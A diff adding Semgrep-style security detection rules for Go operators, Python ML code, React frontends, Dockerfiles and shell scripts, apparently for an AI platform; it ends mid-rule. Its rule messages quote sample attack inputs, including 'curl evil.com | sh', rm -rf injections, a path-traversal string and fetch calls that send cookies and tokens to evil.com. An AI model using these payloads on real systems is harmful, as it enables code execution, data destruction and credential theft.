+  # ==========================================================================
+  # SECTION 5: GO SECURITY — Kubernetes Controllers & Operators
+  # ==========================================================================
+
+  - id: go-exec-command-shell-injection
+    languages: [go]
+    severity: ERROR
+    message: |
+      Command injection via shell execution (CWE-78).
+
+      Attack Vector: User-controlled input from CR spec can be injected into shell commands:
+        exec.Command("/bin/sh", "-c", "echo " + cr.Spec.UserInput)
+      Input like: "; rm -rf /" would execute arbitrary commands.
+
+      Remediation: Use exec.Command with separate arguments (no shell):
+        cmd := exec.Command("echo", cr.Spec.UserInput)  # Safe - no shell interpretation
+
+      Or validate input with allowlist regex before using in shell commands.
+    patterns:
+      - pattern-either:
+          - pattern: exec.Command("/bin/sh", "-c", ...)
+          - pattern: exec.Command("sh", "-c", ...)
+          - pattern: exec.Command("/bin/bash", "-c", ...)
+          - pattern: exec.Command("bash", "-c", ...)
+    metadata:
+      cwe: "CWE-78"
+      owasp: "A03:2021"
+      category: "security"
+
+  - id: go-tls-insecure-skip-verify
+    languages: [go]
+    severity: ERROR
+    message: |
+      TLS certificate verification disabled (CWE-295).
+
+      Attack Vector: Enables Man-in-the-Middle attacks. Attacker can intercept traffic
+      to external APIs and steal credentials or manipulate responses.
+
+      Remediation: Remove "InsecureSkipVerify: true" and use proper certificate validation.
+      For custom CAs, add to system trust store or use custom RootCAs.
+    pattern: |
+      &tls.Config{
+        ...,
+        InsecureSkipVerify: true,
+        ...
+      }
+    metadata:
+      cwe: "CWE-295"
+      owasp: "A02:2021"
+      category: "security"
+
+  - id: go-kubernetes-client-no-owner-reference
+    languages: [go]
+    severity: WARNING
+    message: |
+      Creating Kubernetes resource without OwnerReference.
+
+      Best Practice: Child resources should have OwnerReferences to their parent CR.
+      Without this, resources become orphaned when the CR is deleted (garbage collection fails).
+
+      Remediation: Use controller-runtime helper:
+        import "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"
+
+        if err := controllerutil.SetControllerReference(parentCR, childResource, r.Scheme); err != nil {
+          return err
+        }
+        if err := r.Create(ctx, childResource); err != nil {
+          return err
+        }
+    patterns:
+      - pattern: $CLIENT.Create($CTX, $RESOURCE)
+      - pattern-not-inside: |
+          controllerutil.SetControllerReference(...)
+          ...
+          $CLIENT.Create($CTX, $RESOURCE)
+    metadata:
+      category: "best-practice"
+
+  - id: go-cr-spec-to-configmap-without-validation
+    languages: [go]
+    severity: ERROR
+    message: |
+      CR spec field used in ConfigMap without validation - enables injection attacks.
+
+      Attack Vector: User can create CR with malicious data that gets injected into pods:
+        apiVersion: v1
+        kind: MyCR
+        spec:
+          command: "curl evil.com | sh"  # Attacker-controlled
+
+      If operator creates ConfigMap/Secret with this data and pod uses it in command,
+      attacker achieves remote code execution.
+
+      Remediation: Validate CR spec fields before storing in ConfigMap:
+        - Check length limits (prevent resource exhaustion)
+        - Validate character patterns (no shell metacharacters: $, `, |, ;, &)
+        - Use allowlist regex for expected formats
+        - Sanitize or reject invalid input
+    patterns:
+      - pattern-either:
+          - pattern: |
+              Data: map[string]string{
+                ...,
+                $KEY: $CR.Spec.$FIELD,
+                ...,
+              }
+          - pattern: |
+              Data[$KEY] = $CR.Spec.$FIELD
+      - pattern-inside: |
+          &corev1.ConfigMap{
+            ...
+          }
+      - pattern-not-inside: |
+          if $VALIDATION {
+            ...
+          }
+    metadata:
+      cwe: "CWE-20"
+      category: "security"
+
+  - id: go-sql-injection
+    languages: [go]
+    severity: ERROR
+    message: |
+      SQL injection vulnerability (CWE-89).
+
+      Attack Vector: User input concatenated into SQL query:
+        query := fmt.Sprintf("SELECT * FROM users WHERE id = %s", userID)
+      Input like "1 OR 1=1" would bypass authentication or leak data.
+
+      Remediation: Use parameterized queries:
+        db.Query("SELECT * FROM users WHERE id = ?", userID)
+    patterns:
+      - pattern-either:
+          - pattern: $DB.Query(fmt.Sprintf(..., $INPUT, ...), ...)
+          - pattern: $DB.Exec(fmt.Sprintf(..., $INPUT, ...), ...)
+          - pattern: $DB.Query($QUERY + $INPUT, ...)
+          - pattern: $DB.Exec($QUERY + $INPUT, ...)
+    metadata:
+      cwe: "CWE-89"
+      owasp: "A03:2021"
+      category: "security"
+
+  - id: go-weak-crypto-md5
+    languages: [go]
+    severity: WARNING
+    message: |
+      Weak cryptographic hash MD5 detected (CWE-327).
+
+      MD5 is cryptographically broken (collision attacks). Do not use for security purposes.
+
+      Remediation: Use SHA-256 or SHA-3:
+        import "crypto/sha256"
+        hash := sha256.Sum256(data)
+    patterns:
+      - pattern-either:
+          - pattern: md5.New()
+          - pattern: md5.Sum($DATA)
+    metadata:
+      cwe: "CWE-327"
+      category: "security"
+
+  - id: go-weak-crypto-sha1
+    languages: [go]
+    severity: WARNING
+    message: |
+      Weak cryptographic hash SHA1 detected (CWE-327).
+
+      SHA1 is deprecated due to collision attacks. Do not use for security purposes.
+
+      Remediation: Use SHA-256 or SHA-3.
+    patterns:
+      - pattern-either:
+          - pattern: sha1.New()
+          - pattern: sha1.Sum($DATA)
+    metadata:
+      cwe: "CWE-327"
+      category: "security"
+
+  - id: go-hardcoded-credentials
+    languages: [go]
+    severity: ERROR
+    message: |
+      Hardcoded credentials detected (CWE-798).
+
+      Security Risk: Credentials in source code are visible in git history and container images.
+
+      Remediation: Use environment variables or Kubernetes Secrets:
+        password := os.Getenv("DATABASE_PASSWORD")
+    patterns:
+      - pattern-either:
+          - pattern: |
+              $VAR := $VALUE
+          - pattern: |
+              const $VAR = $VALUE
+          - pattern: |
+              var $VAR = $VALUE
+      - metavariable-regex:
+          metavariable: $VAR
+          regex: (?i)(password|passwd|secret|token|api[_-]?key|private[_-]?key|credentials?)
+      - metavariable-regex:
+          metavariable: $VALUE
+          regex: '"[^"]{8,}"'
+      - pattern-not: |
+          $VAR := os.Getenv("...")
+      - pattern-not: |
+          var $VAR = os.Getenv("...")
+      - pattern-not: |
+          $VAR, $_ := os.LookupEnv("...")
+    metadata:
+      cwe: "CWE-798"
+      owasp: "A07:2021"
+      category: "security"
+
+  - id: go-log-sensitive-data
+    languages: [go]
+    severity: WARNING
+    message: |
+      Logging sensitive data from Kubernetes Secret.
+
+      Security Risk: Secrets logged to stdout appear in:
+        - Kubernetes pod logs (accessible via kubectl logs)
+        - Log aggregation systems (Splunk, Elasticsearch)
+        - Container runtime logs on nodes
+
+      Remediation: Never log Secret.Data fields. Log metadata only:
+        logger.Info("Processing secret", "name", secret.Name, "namespace", secret.Namespace)
+    patterns:
+      - pattern-either:
+          - pattern: $LOG.$METHOD(..., $SECRET.Data, ...)
+          - pattern: $LOG.$METHOD(..., $SECRET.Data[$KEY], ...)
+      - metavariable-regex:
+          metavariable: $METHOD
+          regex: ^(Info|Error|Debug|Warn|Printf|Println)$
+    metadata:
+      cwe: "CWE-532"
+      category: "security"
+
+  - id: go-tls-config-no-min-version
+    languages: [go]
+    severity: INFO
+    message: |
+      TLS config without explicit MinVersion (CWE-326).
+
+      Go 1.18+ defaults to TLS 1.2 minimum, but explicit configuration is recommended
+      for compliance clarity (FedRAMP, FIPS) and defense in depth.
+
+      Remediation: Set MinVersion explicitly:
+        &tls.Config{
+          MinVersion: tls.VersionTLS12,
+        }
+    patterns:
+      - pattern: |
+          &tls.Config{
+            ...
+          }
+      - pattern-not: |
+          &tls.Config{
+            ...,
+            MinVersion: ...,
+            ...
+          }
+    paths:
+      exclude:
+        - "**/vendor/**"
+    metadata:
+      cwe: "CWE-326"
+      category: "security"
+
+  - id: go-http-client-no-timeout
+    languages: [go]
+    severity: WARNING
+    message: |
+      HTTP client without timeout can hang indefinitely (CWE-400).
+
+      An http.Client without an explicit Timeout will wait forever for a response,
+      which can exhaust goroutines and file descriptors under load or network issues.
+
+      Remediation: Always set a Timeout:
+        client := &http.Client{
+          Timeout: 30 * time.Second,
+        }
+    patterns:
+      - pattern: |
+          &http.Client{
+            ...
+          }
+      - pattern-not: |
+          &http.Client{
+            ...,
+            Timeout: ...,
+            ...
+          }
+    metadata:
+      cwe: "CWE-400"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 6: PYTHON SECURITY — ML/Data Science Applications
+  # ==========================================================================
+
+  - id: python-eval-exec-injection
+    languages: [python]
+    severity: ERROR
+    message: |
+      Code injection via eval() or exec() (CWE-94).
+
+      Attack Vector: User-controlled input from API requests, notebook cells, or config files
+      can execute arbitrary Python code:
+        eval(user_input)  # Input: "__import__('os').system('rm -rf /')"
+
+      Remediation: Never use eval/exec with untrusted input.
+      For safe evaluation of literals, use ast.literal_eval():
+        import ast
+        value = ast.literal_eval(user_input)  # Only parses literals (strings, numbers, lists)
+    patterns:
+      - pattern-either:
+          - pattern: eval($INPUT)
+          - pattern: exec($INPUT)
+    metadata:
+      cwe: "CWE-94"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: python-sql-injection-format
+    languages: [python]
+    severity: ERROR
+    message: |
+      SQL injection via f-string or format() (CWE-89).
+
+      Attack Vector: User input in SQL query enables data exfiltration or authentication bypass:
+        cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
+        # Input: "1 OR 1=1" would return all users
+
+      Remediation: Use parameterized queries:
+        cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))  # PostgreSQL
+        cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))   # SQLite
+    patterns:
+      - pattern-either:
+          - pattern: $CURSOR.execute(f"...")
+          - pattern: $CURSOR.execute("...".format(...))
+          - pattern: $CURSOR.execute($QUERY + $INPUT)
+    metadata:
+      cwe: "CWE-89"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: python-pickle-unsafe-load
+    languages: [python]
+    severity: ERROR
+    message: |
+      Unsafe pickle.load() - arbitrary code execution (CWE-502).
+
+      Attack Vector: Pickle can execute arbitrary code during deserialization.
+      A malicious .pkl file can:
+        - Execute shell commands (os.system("..."))
+        - Exfiltrate data to attacker-controlled servers
+        - Install backdoors in the ML serving environment
+
+      Why ML Models Are Targets: PyTorch, scikit-learn, and XGBoost use pickle by default.
+      Attacker uploads poisoned model -> triggers remote code execution on inference.
+
+      Remediation:
+        1. Use safer formats: ONNX, HDF5, SavedModel (TensorFlow), TorchScript
+        2. If pickle is required, validate file source and use signature verification
+        3. Run model loading in sandboxed environment with restricted permissions
+        4. Never load pickle files from untrusted sources (user uploads, HTTP downloads)
+
+      Safe alternatives:
+        # PyTorch
+        torch.jit.save(model, "model.pt")  # TorchScript (no pickle)
+
+        # TensorFlow
+        model.save("model", save_format="tf")  # SavedModel format
+
+        # scikit-learn
+        joblib.dump(model, "model.joblib", compress=3)  # Still uses pickle
+        # Better: Convert to ONNX with skl2onnx
+
+        # ONNX (universal)
+        import onnx
+        onnx.save(model, "model.onnx")
+    patterns:
+      - pattern-either:
+          - pattern: pickle.load($FILE)
+          - pattern: pickle.loads($DATA)
+          - pattern: pickle.Unpickler($FILE)
+          - pattern: joblib.load($FILE)
+    metadata:
+      cwe: "CWE-502"
+      owasp: "A08:2021 - Software and Data Integrity Failures"
+      category: "security"
+      references:
+        - "https://github.com/onnx/onnx"
+        - "https://pytorch.org/docs/stable/jit.html"
+
+  - id: python-yaml-unsafe-load
+    languages: [python]
+    severity: ERROR
+    message: |
+      yaml.load() without safe loader - arbitrary code execution (CWE-502).
+
+      Attack Vector: yaml.load() can instantiate arbitrary Python objects and execute code.
+
+      Remediation: Use yaml.safe_load() instead:
+        import yaml
+        data = yaml.safe_load(file)  # Safe - only parses basic YAML types
+    patterns:
+      - pattern-either:
+          - pattern: yaml.load($INPUT)
+          - pattern: yaml.load($INPUT, Loader=yaml.Loader)
+          - pattern: yaml.load($INPUT, Loader=yaml.FullLoader)
+      - pattern-not: yaml.load($INPUT, Loader=yaml.SafeLoader)
+    metadata:
+      cwe: "CWE-502"
+      category: "security"
+
+  - id: python-shell-injection-subprocess
+    languages: [python]
+    severity: ERROR
+    message: |
+      Command injection via subprocess with shell=True (CWE-78).
+
+      Attack Vector: User input in shell command enables arbitrary command execution:
+        subprocess.run(f"convert {user_file}.png output.jpg", shell=True)
+        # Input: "file.png; rm -rf /" would delete files
+
+      Remediation: Use shell=False with list arguments:
+        subprocess.run(["convert", f"{user_file}.png", "output.jpg"], shell=False)
+        # Safe - no shell interpretation, input is treated as literal argument
+    patterns:
+      - pattern-either:
+          - pattern: subprocess.run(..., shell=True)
+          - pattern: subprocess.Popen(..., shell=True)
+          - pattern: subprocess.call(..., shell=True)
+          - pattern: subprocess.check_output(..., shell=True)
+    metadata:
+      cwe: "CWE-78"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: python-os-system
+    languages: [python]
+    severity: ERROR
+    message: |
+      Command injection via os.system() (CWE-78).
+
+      os.system() always uses shell and is vulnerable to injection.
+
+      Remediation: Use subprocess.run() with shell=False:
+        subprocess.run(["command", "arg1", "arg2"], shell=False)
+    patterns:
+      - pattern: os.system($CMD)
+      - pattern-not: os.system("...")
+    metadata:
+      cwe: "CWE-78"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: python-path-traversal-open
+    languages: [python]
+    severity: ERROR
+    message: |
+      Path traversal vulnerability (CWE-22).
+
+      Attack Vector: User-controlled file paths can access restricted files:
+        open(user_provided_path)
+        # Input: "../../../../etc/passwd" could leak system files
+
+      Remediation: Validate and sanitize file paths:
+        import os
+        safe_path = os.path.normpath(user_provided_path)
+        if not safe_path.startswith(ALLOWED_DIR):
+            raise ValueError("Path traversal detected")
+        open(safe_path)
+    patterns:
+      - pattern-either:
+          - pattern: open($PATH, ...)
+          - pattern: Path($PATH)
+          - pattern: pathlib.Path($PATH)
+      - metavariable-pattern:
+          metavariable: $PATH
+          patterns:
+            - pattern-not: "..."  # Exclude literal strings
+    metadata:
+      cwe: "CWE-22"
+      owasp: "A01:2021 - Broken Access Control"
+      category: "security"
+
+  - id: python-hardcoded-password
+    languages: [python]
+    severity: ERROR
+    message: |
+      Hardcoded password/secret detected (CWE-798).
+
+      Security Risk: Credentials in source code are visible in git history and container images.
+
+      Remediation: Use environment variables:
+        import os
+        password = os.getenv("DATABASE_PASSWORD")
+        if not password:
+            raise ValueError("DATABASE_PASSWORD not set")
+    patterns:
+      - pattern-either:
+          - pattern: password = $VALUE
+          - pattern: PASSWORD = $VALUE
+          - pattern: api_key = $VALUE
+          - pattern: API_KEY = $VALUE
+          - pattern: secret = $VALUE
+          - pattern: SECRET = $VALUE
+          - pattern: token = $VALUE
+          - pattern: TOKEN = $VALUE
+      - metavariable-pattern:
+          metavariable: $VALUE
+          patterns:
+            - pattern-regex: |-
+                ["'][^"']{8,}["']
+    metadata:
+      cwe: "CWE-798"
+      owasp: "A07:2021 - Identification and Authentication Failures"
+      category: "security"
+
+  - id: python-flask-debug-mode-production
+    languages: [python]
+    severity: WARNING
+    message: |
+      Flask debug mode enabled (potential production issue).
+
+      Security Risk: Debug mode exposes:
+        - Interactive Python debugger (code execution via web interface)
+        - Detailed error messages with source code
+        - Automatic code reloading
+
+      Remediation: Never enable debug mode in production:
+        app.run(debug=False)  # Production
+        # Or control via environment variable:
+        app.run(debug=os.getenv("FLASK_DEBUG", "false") == "true")
+    pattern: app.run(..., debug=True, ...)
+    metadata:
+      category: "security"
+
+  - id: python-sql-alchemy-text-injection
+    languages: [python]
+    severity: ERROR
+    message: |
+      SQL injection via SQLAlchemy text() without parameterization (CWE-89).
+
+      Attack Vector: String concatenation in text() bypasses ORM protections:
+        db.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
+
+      Remediation: Use parameterized queries:
+        db.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
+    patterns:
+      - pattern-either:
+          - pattern: text(f"...")
+          - pattern: text("..." + ...)
+          - pattern: text("...".format(...))
+    metadata:
+      cwe: "CWE-89"
+      category: "security"
+
+  - id: python-pandas-eval-query
+    languages: [python]
+    severity: WARNING
+    message: |
+      pandas.eval() or DataFrame.query() with user input - potential code injection.
+
+      Attack Vector: User-controlled expressions can execute arbitrary code:
+        df.query(user_input)  # Input: "__import__('os').system('...')"
+
+      Remediation: Validate input against allowlist of safe column names and operators:
+        SAFE_COLUMNS = {"price", "quantity", "total"}
+        if not all(col in SAFE_COLUMNS for col in extract_columns(user_query)):
+            raise ValueError("Invalid column")
+        df.query(user_query)
+    patterns:
+      - pattern-either:
+          - pattern: pd.eval($EXPR)
+          - pattern: pandas.eval($EXPR)
+          - pattern: $DF.eval($EXPR)
+          - pattern: $DF.query($EXPR)
+    metadata:
+      cwe: "CWE-94"
+      category: "security"
+
+  - id: python-huggingface-trust-remote-code
+    languages: [python]
+    severity: WARNING
+    message: |
+      trust_remote_code=True enables arbitrary code execution from model repos (CWE-829).
+
+      Attack Vector: HuggingFace models with trust_remote_code=True download and execute
+      arbitrary Python code from the model repository. A malicious model can:
+        - Execute shell commands on the serving infrastructure
+        - Exfiltrate data and credentials
+        - Install backdoors or cryptominers
+
+      RHOAI Impact: Affects Caikit, vLLM, and any service loading HuggingFace models.
+
+      Remediation:
+        - Use trust_remote_code=False (default since transformers 4.0+)
+        - Pin model commits to verified revisions
+        - Use model scanning tools (ModelScan, Safetensors)
+        - If trust_remote_code=True is required, add justification comment:
+          # nosemgrep: python-huggingface-trust-remote-code - Model X requires custom code
+    patterns:
+      - pattern-either:
+          - pattern: AutoModel.from_pretrained(..., trust_remote_code=True, ...)
+          - pattern: AutoTokenizer.from_pretrained(..., trust_remote_code=True, ...)
+          - pattern: AutoModelForCausalLM.from_pretrained(..., trust_remote_code=True, ...)
+          - pattern: AutoModelForSeq2SeqLM.from_pretrained(..., trust_remote_code=True, ...)
+          - pattern: pipeline(..., trust_remote_code=True, ...)
+    metadata:
+      cwe: "CWE-829"
+      owasp: "A08:2021 - Software and Data Integrity Failures"
+      category: "security"
+      references:
+        - "https://huggingface.co/docs/transformers/main/en/autoclass_tutorial"
+
+  - id: python-torch-load-unsafe
+    languages: [python]
+    severity: WARNING
+    message: |
+      torch.load() without weights_only=True - arbitrary code execution via pickle (CWE-502).
+
+      Attack Vector: PyTorch uses pickle internally. A malicious .pt/.pth file can execute
+      arbitrary code during deserialization:
+        model = torch.load("malicious_model.pt")  # Executes hidden payload
+
+      RHOAI Impact: KServe, ModelMesh, and inference services loading user-uploaded models.
+
+      Remediation: Use weights_only=True (PyTorch 2.0+):
+        model = torch.load("model.pt", weights_only=True)
+
+      For training checkpoints that need full state:
+        - Validate source is trusted (internal model registry, not user uploads)
+        - Use Safetensors format instead: safetensors.torch.load_file("model.safetensors")
+        - Add justification: # nosemgrep: python-torch-load-unsafe - internal trusted source
+    patterns:
+      - pattern: torch.load(...)
+      - pattern-not: torch.load(..., weights_only=True, ...)
+    metadata:
+      cwe: "CWE-502"
+      owasp: "A08:2021 - Software and Data Integrity Failures"
+      category: "security"
+      references:
+        - "https://pytorch.org/docs/stable/generated/torch.load.html"
+
+  - id: python-unsafe-deserialization-dill-cloudpickle
+    languages: [python]
+    severity: INFO
+    message: |
+      Unsafe deserialization via dill/cloudpickle/shelve (CWE-502).
+
+      Attack Vector: Like pickle, these libraries can execute arbitrary code during
+      deserialization. A malicious serialized object can compromise the service.
+
+      Context: dill and cloudpickle are commonly used in distributed ML frameworks
+      (Ray, Dask) for internal task serialization. This is generally safe when
+      deserializing data from trusted internal sources (Ray workers, Dask scheduler).
+
+      Risk: HIGH when deserializing user-provided or externally-sourced data.
+      Risk: LOW when used for internal framework communication.
+
+      Remediation:
+        - Never deserialize data from untrusted sources
+        - For internal framework use, add justification comment:
+          # nosemgrep: python-unsafe-deserialization-dill-cloudpickle - internal Ray serialization
+    patterns:
+      - pattern-either:
+          - pattern: dill.load(...)
+          - pattern: dill.loads(...)
+          - pattern: cloudpickle.load(...)
+          - pattern: cloudpickle.loads(...)
+          - pattern: shelve.open(...)
+    metadata:
+      cwe: "CWE-502"
+      owasp: "A08:2021 - Software and Data Integrity Failures"
+      category: "security"
+
+  - id: python-ssl-verify-disabled
+    languages: [python]
+    severity: WARNING
+    message: |
+      SSL/TLS certificate verification disabled (CWE-295).
+
+      Attack Vector: verify=False disables certificate validation, enabling
+      Man-in-the-Middle attacks. Attacker can intercept and modify traffic
+      including credentials, model data, and API responses.
+
+      Context: In Kubernetes with Istio service mesh, internal service calls
+      may legitimately use verify=False since mTLS is handled at the proxy layer.
+      This is UNSAFE for external API calls (HuggingFace, S3, external services).
+
+      Remediation:
+        - For external APIs: Use verify=True (default) with proper CA certificates
+        - For internal services with service mesh: Document the architectural decision
+          # nosemgrep: python-ssl-verify-disabled - internal mTLS via Istio
+        - For custom CAs: Point to CA bundle: verify="/path/to/ca-bundle.crt"
+    patterns:
+      - pattern-either:
+          - pattern: requests.get(..., verify=False, ...)
+          - pattern: requests.post(..., verify=False, ...)
+          - pattern: requests.put(..., verify=False, ...)
+          - pattern: requests.delete(..., verify=False, ...)
+          - pattern: requests.patch(..., verify=False, ...)
+          - pattern: httpx.Client(..., verify=False, ...)
+          - pattern: httpx.AsyncClient(..., verify=False, ...)
+    paths:
+      exclude:
+        - "**/tests/**"
+        - "**/*_test.py"
+        - "**/test_*.py"
+    metadata:
+      cwe: "CWE-295"
+      owasp: "A02:2021 - Cryptographic Failures"
+      category: "security"
+
+  - id: python-grpc-insecure-channel
+    languages: [python]
+    severity: INFO
+    message: |
+      gRPC insecure channel - no TLS encryption (CWE-319).
+
+      Attack Vector: grpc.insecure_channel() transmits data in plaintext,
+      enabling eavesdropping and tampering.
+
+      Context: In Kubernetes with service mesh (Istio/Envoy), internal gRPC calls
+      often use insecure channels since mTLS is handled at the sidecar proxy layer.
+      This is standard for KServe, ModelMesh, and internal model serving.
+
+      Risk: HIGH for external/egress gRPC calls outside the cluster.
+      Risk: LOW for internal cluster communication with service mesh.
+
+      Remediation:
+        - External calls: Use grpc.secure_channel() with proper credentials
+        - Internal calls with service mesh: Document the decision
+          # nosemgrep: python-grpc-insecure-channel - Istio mTLS handles encryption
+    pattern: grpc.insecure_channel(...)
+    metadata:
+      cwe: "CWE-319"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 7: TYPESCRIPT / JAVASCRIPT SECURITY — React Frontends
+  # ==========================================================================
+
+  - id: ts-react-dangerous-html-no-sanitization
+    languages: [typescript, javascript]
+    severity: ERROR
+    message: |
+      XSS vulnerability via dangerouslySetInnerHTML without sanitization (CWE-79).
+
+      Attack Vector: User-controlled HTML rendered without sanitization:
+        <div dangerouslySetInnerHTML={{ __html: userComment }} />
+        // userComment: "<img src=x onerror='alert(document.cookie)'>"
+
+      Impact: Attacker can:
+        - Steal session tokens via document.cookie
+        - Perform actions as victim user (CSRF)
+        - Redirect to phishing sites
+        - Inject keyloggers
+
+      Remediation: Sanitize HTML with DOMPurify before rendering:
+        import DOMPurify from 'dompurify';
+
+        <div dangerouslySetInnerHTML={{
+          __html: DOMPurify.sanitize(userComment, {
+            ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a'],
+            ALLOWED_ATTR: ['href']
+          })
+        }} />
+    patterns:
+      - pattern: |
+          <$EL dangerouslySetInnerHTML={{__html: $HTML}} />
+      - pattern-not: |
+          <$EL dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(...)}} />
+    metadata:
+      cwe: "CWE-79"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: ts-react-href-javascript-protocol
+    languages: [typescript, javascript]
+    severity: ERROR
+    message: |
+      XSS vulnerability via javascript: protocol in href (CWE-79).
+
+      Attack Vector: User-controlled href with javascript: protocol executes arbitrary code:
+        <a href={userUrl}>Click me</a>
+        // userUrl: "javascript:alert(document.cookie)"
+
+      Remediation: Validate URLs and block javascript: protocol:
+        const isSafeUrl = (url: string) => {
+          return url.startsWith('http://') || url.startsWith('https://') || url.startsWith('/');
+        };
+
+        {isSafeUrl(userUrl) && <a href={userUrl}>Click me</a>}
+    patterns:
+      - pattern: |
+          <$EL href={$URL} ...>
+            ...
+          </$EL>
+      - metavariable-pattern:
+          metavariable: $URL
+          patterns:
+            - pattern-not: '"..."'  # Exclude literal strings
+    metadata:
+      cwe: "CWE-79"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: ts-eval-injection
+    languages: [typescript, javascript]
+    severity: ERROR
+    message: |
+      Code injection via eval() (CWE-94).
+
+      Attack Vector: eval() executes arbitrary JavaScript:
+        eval(userInput)  // Input: "fetch('https://evil.com?cookies='+document.cookie)"
+
+      Remediation: Never use eval() with user input.
+        - For JSON: Use JSON.parse()
+        - For dynamic property access: Use bracket notation obj[prop]
+        - For dynamic function calls: Use Function constructor (with extreme caution)
+    pattern: eval($INPUT)
+    metadata:
+      cwe: "CWE-94"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+
+  - id: ts-function-constructor-injection
+    languages: [typescript, javascript]
+    severity: WARNING
+    message: |
+      Code injection via Function constructor.
+
+      Similar to eval(), Function constructor can execute arbitrary code:
+        new Function(userCode)()
+
+      Remediation: Avoid dynamic code execution. Use safe alternatives.
+    pattern: new Function($CODE)
+    metadata:
+      cwe: "CWE-94"
+      category: "security"
+
+  - id: ts-localstorage-sensitive-data
+    languages: [typescript, javascript]
+    severity: WARNING
+    message: |
+      Sensitive data stored in localStorage (CWE-922).
+
+      Security Risks:
+        1. localStorage is accessible to ALL scripts on same origin (XSS can steal it)
+        2. Data persists indefinitely (even after browser close)
+        3. No httpOnly protection (accessible via JavaScript)
+        4. No secure flag (transmitted over HTTP if page downgrades)
+
+      Attack Vector: XSS exploit reads localStorage:
+        fetch('https://evil.com?token=' + localStorage.getItem('token'))
+
+      Remediation: Use httpOnly secure cookies for sensitive data:
+        Set-Cookie: session=...; HttpOnly; Secure; SameSite=Strict
+
+        Cookies with httpOnly cannot be accessed by JavaScript (XSS protection).
+    patterns:
+      - pattern-either:
+          - pattern: localStorage.setItem("token", ...)
+          - pattern: localStorage.setItem("password", ...)
+          - pattern: localStorage.setItem("apiKey", ...)
+          - pattern: localStorage.setItem("secret", ...)
+          - pattern: localStorage.setItem("jwt", ...)
+          - pattern: localStorage.setItem("auth", ...)
+    metadata:
+      cwe: "CWE-922"
+      owasp: "A02:2021 - Cryptographic Failures"
+      category: "security"
+
+  - id: ts-regex-denial-of-service
+    languages: [typescript, javascript]
+    severity: INFO
+    message: |
+      Potentially vulnerable regex - possible ReDoS (CWE-1333).
+
+      Vulnerable pattern detected: Nested quantifiers like (a+)+ or (a*)*
+      Review if user-controlled input can reach this regex.
+
+      Attack Vector: Malicious input causes exponential backtracking:
+        /^(a+)+$/.test('a'.repeat(50) + 'b')  // Takes minutes to fail
+
+      Remediation: Simplify regex or use timeout:
+        - Avoid nested quantifiers: /^a+$/ instead of /^(a+)+$/
+        - Use atomic groups if available
+        - Set regex timeout in Node.js (not supported in browser)
+    pattern-regex: '\([^)]*[+*]\)[+*{]'
+    metadata:
+      cwe: "CWE-1333"
+      owasp: "A06:2021 - Vulnerable and Outdated Components"
+      category: "security"
+
+  - id: ts-postmessage-no-origin-check
+    languages: [typescript, javascript]
+    severity: ERROR
+    message: |
+      postMessage listener without origin validation (CWE-942).
+
+      Attack Vector: Malicious iframe sends messages to steal data or trigger actions:
+        window.addEventListener('message', (event) => {
+          processCommand(event.data);  // No origin check!
+        });
+
+      Remediation: Validate message origin:
+        window.addEventListener('message', (event) => {
+          if (event.origin !== 'https://trusted-domain.com') {
+            return;  // Reject messages from untrusted origins
+          }
+          processCommand(event.data);
+        });
+    patterns:
+      - pattern: |
+          window.addEventListener('message', ($EVENT) => {
+            ...
+          })
+      - pattern-not-inside: |
+          if ($EVENT.origin === ...) {
+            ...
+          }
+      - pattern-not-inside: |
+          if ($EVENT.origin !== ...) {
+            return;
+          }
+    metadata:
+      cwe: "CWE-942"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 8: DOCKERFILE SECURITY
+  # ==========================================================================
+
+  - id: dockerfile-latest-tag
+    languages: [dockerfile]
+    severity: WARNING
+    message: |
+      Using 'latest' tag is not recommended for reproducibility.
+
+      The :latest tag is mutable and can point to different images over time,
+      causing builds to be non-reproducible and potentially introducing
+      breaking changes or vulnerabilities.
+
+      Remediation: Pin to a specific version:
+        FROM registry/image:v1.2.3
+    pattern-regex: 'FROM\s+[^:]+:latest'
+    metadata:
+      category: "security"
+
+  - id: dockerfile-secret-in-env
+    languages: [dockerfile]
+    severity: ERROR
+    message: |
+      Hardcoded secret in Dockerfile ENV instruction (CWE-798).
+
+      ENV values are baked into image layers and visible via:
+        - docker history
+        - docker inspect
+        - Container runtime metadata
+
+      Remediation: Use build args with --secret flag (BuildKit) or runtime env vars:
+        # Build-time: docker build --secret id=mysecret,src=secret.txt
+        RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
+    pattern-regex: 'ENV\s+(PASSWORD|SECRET|TOKEN|API_KEY)\s*=\s*.+'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 9: SHELL SCRIPT SECURITY
+  # ==========================================================================
+
+  - id: shell-eval-injection
+    languages: [bash, sh]
+    severity: ERROR
+    message: |
+      Use of 'eval' is dangerous and can lead to code injection (CWE-94).
+
+      eval executes its arguments as a shell command, which can be exploited
+      if any part of the input comes from untrusted sources.
+
+      Remediation: Avoid eval. Use arrays for dynamic commands:
+        # Instead of: eval "$cmd"
+        # Use: "${cmd_array[@]}"
+    pattern-regex: 'eval\s+'
+    metadata:
+      cwe: "CWE-94"
+      category: "security"
+
+  - id: shell-unquoted-var-in-dangerous-cmd
+    languages: [bash, sh]
+    severity: ERROR
+    message: |
+      Unquoted variable in dangerous command - potential command injection (CWE-78).
+
+      Unquoted variables in commands like rm, cp, mv, chmod, chown, kill undergo
+      word splitting and glob expansion. A filename with spaces or special characters
+      can cause unintended behavior or arbitrary file operations.
+
+      Remediation: Always quote variables in file operations:
